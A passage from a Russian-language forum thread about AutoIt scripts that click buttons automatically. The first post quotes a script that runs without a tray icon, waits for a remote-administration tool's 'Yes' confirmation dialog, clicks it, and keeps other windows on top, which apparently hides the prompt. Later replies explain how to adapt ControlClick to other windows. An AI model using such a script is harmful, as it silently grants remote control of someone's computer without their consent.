• Уменьшение отступа

    Обратная связь

    (info@ru-sfera.pw)

AutoIT скрипт на нажатие кнопки


Magic_Mushroom

Уважаемый пользователь
Форумчанин
Регистрация
30.06.2014
Сообщения
178
Репутация
78
X-Shar приводил пример скрипта для нажатия "да" в рмс хосте
Код:
;Скрипт автоматически нажимает "Да"
#NoTrayIcon
While 1
    $hRMS = WinGetHandle("Remote Manipulator System - Вопрос") ;Получаем дискриптор окна с вопросом
    $hWnd = WinGetHandle("[ACTIVE]") ;Получаем текущее активное окно
    If $hWnd<>0 and ($hRMS="")  Then
        WinSetOnTop($hWnd, "", 1) ;Делаем текуущее активное окно поверх остальных (Кроме нашего окна с вопросом)
    EndIf
      If $hRMS<>"" Then
      ControlClick($hRMS, "", "[CLASS:Button;INSTANCE:1]") ;Если окно появилось, то быстренько нажимаем "Да" и выходим из цикла...
      ExitLoop ;Выходим из проги
    EndIf
WEnd
подскажите какие части скрипта надо менять, чтобы воспользоваться им для любых других окон и нажатий кнопок в этих окнах blush1
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 173
подскажите какие части скрипта надо менять, чтобы воспользоваться им для любых других окон и нажатий кнопок в этих окнах blush1
$hRMS =WinGetHandle("Remote Manipulator System - Вопрос") ;Получаем дискриптор окна с вопросом
"Remote Manipulator System - Вопрос" - Это заголовок окна, $hRMS - его дескриптор, он нужен для манипуляций с окном...

Для нажатия кнопки в окне, этот код:

ControlClick($hRMS, "", "[CLASS:Button;INSTANCE:1]")

"[CLASS:Button;INSTANCE:1]" - Идентефикатор эллемента управления, короче главное найти INSTANCE кнопочки...

Его найти можно при помощи AutoIT Windows Info он входит в дистрибутив AutoIT, рекомендую курить:



И



Там документация на Русском...
 

Magic_Mushroom

Уважаемый пользователь
Форумчанин
Регистрация
30.06.2014
Сообщения
178
Репутация
78
спасибо!:) разобрался:)
остался только вопрос как изменять скрипт , если мне например надо 2 кнопки нажать в одном окне, либо нажать кнопку в одном окне и нажать кнопку в другом окне в другом окне
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 173
спасибо!:) разобрался:)
остался только вопрос как изменять скрипт , если мне например надо 2 кнопки нажать в одном окне, либо нажать кнопку в одном окне и нажать кнопку в другом окне в другом окне
Ну так-же:
ControlClick($hRMS, "", "[CLASS:Button;INSTANCE:1]") - Нажатие на кнопку 1
ControlClick($hRMS, "", "[CLASS:Button;INSTANCE:2]") - Нажатие на кнопку 2

С окнами то-же самое, получаешь дескриптор окна например по заголовку, или в AutoIT Windows Info и нажимаешь кнопки...
 
R

Robot1127

Гость
Всем привет! Есть у меня проблема: Я инсталлировал программу на свой компьютер, она нормально работает, но мне хочется сделать автоматическое нажатие одной какой-то (на мой выбор) кнопки. Нажатие должно происходить автоматически каждые 20 или 30 секунд. Может уже есть у кого-то готовое решение? Может я могу заказать изготовление такого скрипта? Прошу отозваться. Заранее благодарен.
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 173
Может я могу заказать изготовление такого скрипта? Прошу отозваться. Заранее благодарен.
Заказать можно, но у меня минимальная цена это 500 рублей, если нужно напиши в ЛС, более подробно что нужно сделать !
 

E_kr

Пользователь
Первый уровень
Регистрация
22.05.2018
Сообщения
2
Telegram
Помогите пожалуйста)
Нужен скрипт для игры.
Суть скрипта.
В игре КРМП будет появляется типо как окошкое где будут числа 6 и 4(они рандомны)(только цифра 4 и 6) .Мне надо чтобы когда они появлялись скрипт автоматически нажимал на нампаде.
Заранее спасибо
 
Верх Низ